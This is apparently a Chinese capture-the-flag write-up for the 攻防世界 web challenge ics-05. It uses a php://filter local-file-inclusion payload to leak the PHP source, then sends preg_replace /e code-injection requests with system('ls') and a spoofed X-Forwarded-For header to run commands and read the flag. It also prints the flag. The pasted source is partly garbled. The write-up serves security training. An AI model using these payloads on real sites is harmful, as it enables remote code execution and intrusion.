攻防世界 web 进阶 ics-05 wp

上来先用php伪协议爆一波源码
page=php://filter/read=convert.base64-encode/resource=index.php

然后把得到的结果base64解密得到源码

    
    
    
    
    
    
    



    

        
云平台设备维护中心
    
    

        
设备列表
    
    
    
    
    
    



    




    

        

    






        




        

            

                 0) {
                    die();
                }

                if (strpos($page, 'ta:text') > 0) {
                    die();
                }

                if (strpos($page, 'text') > 0) {
                    die();
                }

                if ($page === 'index.php') {
                    die('Ok');
                }
                    include($page);
                    die();
                ?>
        
        





Welcome My Admin ! 
";

    $pattern = $_GET[pat];
    $replacement = $_GET[rep];
    $subject = $_GET[sub];

    if (isset($pattern) && isset($replacement) && isset($subject)) {
        preg_replace($pattern, $replacement, $subject);
    }else{
        die();
    }

}





?>

传了三个参数
看到了preg_replace这个函数
正则替换函数
/e 修正符会使 preg_replace() 将 replacement 参数当作 PHP 代码

用burp suite玩儿

包抓下来
复制内容
粘到重发器
get方式把三个参数 传上去
GET /index.php?pat=/.*/e&rep=system(‘ls’)&sub=qq HTTP/1.1
加参数
X-Forwarded-For:127.0.0.1
发送

响应：

到s3chahahaDir里看看
GET /index.php?pat=/.*/e&rep=system(‘ls+s3chahahaDir’)&sub=aa HTTP/1.1

里面有个flag文件夹
进去看看

有个flag.php文件
打开看看

拿到flag

flag = ‘cyberpeace{4eb38ca75885f5e5045354b8494d4e0a}’

cyberpeace{4eb38ca75885f5e5045354b8494d4e0a}

完事儿